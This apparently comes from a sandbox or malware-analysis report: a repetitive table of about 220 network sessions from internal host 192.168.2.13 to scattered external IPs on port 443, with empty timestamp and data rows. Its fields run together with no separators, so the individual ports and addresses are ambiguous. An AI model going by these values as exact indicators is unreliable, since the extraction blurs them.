                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22813192.168.2.1338570103.238.156.70443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22814192.168.2.1357344176.254.63.249443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22815192.168.2.134891019.206.243.230443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22816192.168.2.1335000168.71.89.82443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22817192.168.2.13400288.177.78.158443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22818192.168.2.134381672.176.191.101443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22819192.168.2.135823054.251.117.149443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22820192.168.2.1342644136.102.37.186443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22821192.168.2.1353756187.14.149.37443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22822192.168.2.1349114139.123.166.245443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22823192.168.2.1341894202.34.97.193443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22824192.168.2.135156239.113.242.177443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22825192.168.2.135645277.219.32.85443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22826192.168.2.1343004201.165.99.35443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22827192.168.2.1339226130.14.52.149443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22828192.168.2.134154284.185.90.58443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22829192.168.2.1359470205.18.122.209443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22830192.168.2.135711846.5.107.78443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22831192.168.2.1342508207.61.186.36443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22832192.168.2.134490436.25.85.237443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22833192.168.2.1356704191.82.11.147443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22834192.168.2.1340320176.149.21.172443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22835192.168.2.134585020.104.210.254443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22836192.168.2.133417873.226.184.75443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22837192.168.2.1349346190.227.128.157443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22838192.168.2.133879849.177.56.58443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22839192.168.2.1352214182.156.66.233443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22840192.168.2.1346124182.61.148.14443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22841192.168.2.1355708175.67.58.101443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22842192.168.2.1340496182.7.55.215443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22843192.168.2.135572279.255.71.254443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22844192.168.2.133769669.61.80.230443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22845192.168.2.133680274.45.11.139443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22846192.168.2.1359954140.166.85.201443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22847192.168.2.1343980122.94.91.104443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22848192.168.2.1355340169.139.136.1443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22849192.168.2.1345288220.51.123.231443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22850192.168.2.1334478126.184.176.34443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22851192.168.2.1336618105.158.228.73443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22852192.168.2.1341244101.1.255.42443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22853192.168.2.134497464.73.26.44443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22854192.168.2.1357226171.59.161.142443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22855192.168.2.133516699.231.88.26443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22856192.168.2.1358644221.72.133.77443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22857192.168.2.1341568193.247.140.255443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22858192.168.2.1355998188.188.92.30443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22859192.168.2.1357566112.232.145.157443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22860192.168.2.1355192222.121.122.23443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22861192.168.2.1342058221.206.192.180443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22862192.168.2.1334790125.83.6.150443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22863192.168.2.1336102168.148.75.129443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22864192.168.2.135258052.225.2.176443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22865192.168.2.1348856191.126.26.153443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22866192.168.2.1341690172.61.125.83443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22867192.168.2.1358848135.252.20.105443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22868192.168.2.1344878210.46.7.233443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22869192.168.2.133848427.64.5.64443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22870192.168.2.1339384150.211.237.62443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22871192.168.2.135229425.177.79.63443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22872192.168.2.1337954185.204.226.58443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22873192.168.2.1333058193.98.138.41443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22874192.168.2.135193670.103.11.113443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22875192.168.2.133647680.158.200.1443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22876192.168.2.13394162.107.248.102443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22877192.168.2.135198458.226.28.119443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22878192.168.2.135592697.220.196.251443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22879192.168.2.1335938212.219.194.33443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22880192.168.2.1345214156.197.69.170443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22881192.168.2.135359031.160.255.253443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22882192.168.2.135827634.209.111.110443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22883192.168.2.1349370155.61.245.234443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22884192.168.2.1335942199.57.226.70443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22885192.168.2.1338072187.37.60.92443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22886192.168.2.1359276197.37.28.175443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22887192.168.2.1334144202.112.195.95443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22888192.168.2.135247697.231.160.209443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22889192.168.2.1352138153.115.52.202443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22890192.168.2.135449882.10.187.133443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22891192.168.2.134821883.69.16.200443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22892192.168.2.134186084.226.78.177443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22893192.168.2.1358854151.254.225.108443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22894192.168.2.1357938219.250.0.13443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22895192.168.2.135393094.134.167.192443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22896192.168.2.1346220153.11.16.214443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22897192.168.2.1350680118.5.192.234443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22898192.168.2.1339970147.90.138.7443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22899192.168.2.1346868184.206.248.89443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22900192.168.2.133863248.139.37.57443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22901192.168.2.134106623.157.74.210443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22902192.168.2.1342234191.38.159.175443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22903192.168.2.133601088.95.110.103443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22904192.168.2.134690488.146.199.234443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22905192.168.2.1343058209.200.78.203443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22906192.168.2.1358668142.63.24.161443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22907192.168.2.1346270193.212.98.109443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22908192.168.2.1357458202.2.174.83443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22909192.168.2.1342216218.36.152.68443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22910192.168.2.135268253.76.52.1443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22911192.168.2.1344686196.219.247.130443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22912192.168.2.1336746115.187.230.126443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22913192.168.2.135257050.40.212.33443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22914192.168.2.1348506203.180.103.55443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22915192.168.2.133308463.134.164.84443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22916192.168.2.1349566117.90.130.180443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22917192.168.2.134399687.4.255.7443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22918192.168.2.1349534169.219.11.198443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22919192.168.2.1344992211.8.232.42443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22920192.168.2.135752850.115.246.199443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22921192.168.2.1355400180.40.223.221443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22922192.168.2.1358208161.230.3.19443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22923192.168.2.1336318147.235.209.249443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22924192.168.2.1349000135.115.141.26443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22925192.168.2.13526765.114.17.192443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22926192.168.2.1332854124.56.146.101443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22927192.168.2.1335502126.199.201.255443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22928192.168.2.133288458.212.35.177443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22929192.168.2.135766249.171.236.105443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22930192.168.2.134742878.50.77.48443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22931192.168.2.1345024191.65.174.60443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22932192.168.2.135144848.212.238.255443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22933192.168.2.134398252.185.116.219443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22934192.168.2.13487648.61.216.116443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22935192.168.2.1355708138.164.167.205443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22936192.168.2.1334656119.152.199.205443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22937192.168.2.1347570105.76.219.213443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22938192.168.2.13558181.67.134.91443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22939192.168.2.135534880.172.200.72443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22940192.168.2.1349548170.28.74.145443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22941192.168.2.1351330108.188.235.35443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22942192.168.2.1344032208.57.153.244443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22943192.168.2.1345278177.161.18.197443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22944192.168.2.1357788191.209.224.115443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22945192.168.2.134724693.137.64.187443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22946192.168.2.1345420147.122.249.113443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22947192.168.2.134537038.250.125.209443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22948192.168.2.1360454130.43.151.131443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22949192.168.2.1348482101.23.67.225443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22950192.168.2.1334994115.14.92.204443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22951192.168.2.135638482.58.239.200443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22952192.168.2.1334056150.37.216.125443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22953192.168.2.1349530198.222.37.138443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22954192.168.2.1341580203.203.35.202443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22955192.168.2.1343340108.16.236.145443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22956192.168.2.1336350209.26.165.140443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22957192.168.2.1355684114.173.22.214443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22958192.168.2.1333598213.192.142.24443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22959192.168.2.1352648203.185.67.147443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22960192.168.2.133571893.229.215.34443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22961192.168.2.135939684.206.13.90443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22962192.168.2.134488270.137.73.8443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22963192.168.2.1338424103.214.112.122443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22964192.168.2.135778449.89.87.161443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22965192.168.2.1346012172.32.1.198443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22966192.168.2.1334828173.117.34.30443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22967192.168.2.135770035.7.47.47443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22968192.168.2.1341376217.28.172.225443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22969192.168.2.1341290135.231.198.243443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22970192.168.2.1340574220.140.174.122443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22971192.168.2.1347386217.56.110.79443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22972192.168.2.13609288.102.27.184443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22973192.168.2.1348122118.36.185.110443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22974192.168.2.1350586203.73.9.226443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22975192.168.2.135861281.249.6.193443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22976192.168.2.1338502154.172.80.226443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22977192.168.2.1356224190.189.51.173443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22978192.168.2.1347802182.143.242.127443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22979192.168.2.1355410218.110.168.161443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22980192.168.2.1353356160.223.241.229443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22981192.168.2.1336396194.73.149.43443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22982192.168.2.1353788164.112.217.179443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22983192.168.2.1345446211.230.13.243443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22984192.168.2.135685034.104.86.31443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22985192.168.2.1358018190.77.125.174443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22986192.168.2.135172642.95.75.20443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22987192.168.2.1349766137.148.54.220443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22988192.168.2.1338264142.168.58.198443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22989192.168.2.1353178182.255.62.18443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22990192.168.2.1337104196.28.52.22443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22991192.168.2.133610412.171.139.90443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22992192.168.2.1342118183.166.175.36443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22993192.168.2.1343592159.185.128.245443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22994192.168.2.1353552208.213.144.100443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22995192.168.2.1358114204.81.215.195443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22996192.168.2.1337614188.5.73.134443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22997192.168.2.1359306166.122.184.150443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22998192.168.2.1333734135.88.93.151443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        22999192.168.2.1355740117.208.175.237443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23000192.168.2.135821480.135.204.119443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23001192.168.2.1339760156.248.231.227443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23002192.168.2.135987662.17.101.12443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23003192.168.2.1345048149.198.99.236443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23004192.168.2.1337130126.151.105.201443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23005192.168.2.1337368147.252.195.139443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23006192.168.2.1353292123.160.31.152443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23007192.168.2.1356188205.52.215.67443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23008192.168.2.1352394149.51.243.143443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23009192.168.2.1344332123.8.215.207443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23010192.168.2.133759641.53.185.15443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23011192.168.2.1351100114.50.98.214443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23012192.168.2.133831217.191.232.205443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23013192.168.2.135252066.141.49.53443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23014192.168.2.1352704205.153.160.178443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23015192.168.2.1335622162.93.131.68443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23016192.168.2.136055083.101.81.62443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23017192.168.2.134225683.147.127.235443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23018192.168.2.1360766143.124.222.153443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23019192.168.2.1353774104.142.186.88443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23020192.168.2.1336436125.219.141.135443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23021192.168.2.135570834.122.194.7443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23022192.168.2.135493670.161.48.92443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23023192.168.2.133526268.96.186.178443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23024192.168.2.135316296.49.86.131443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23025192.168.2.1341140180.239.210.20443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23026192.168.2.133773268.190.241.208443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23027192.168.2.1335762130.9.51.126443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23028192.168.2.133922497.141.186.49443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23029192.168.2.133755049.235.217.197443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23030192.168.2.1360824167.98.96.155443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23031192.168.2.1333258173.80.111.89443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23032192.168.2.135415261.216.91.67443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        23033192.168.2.134370864.141.197.30443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
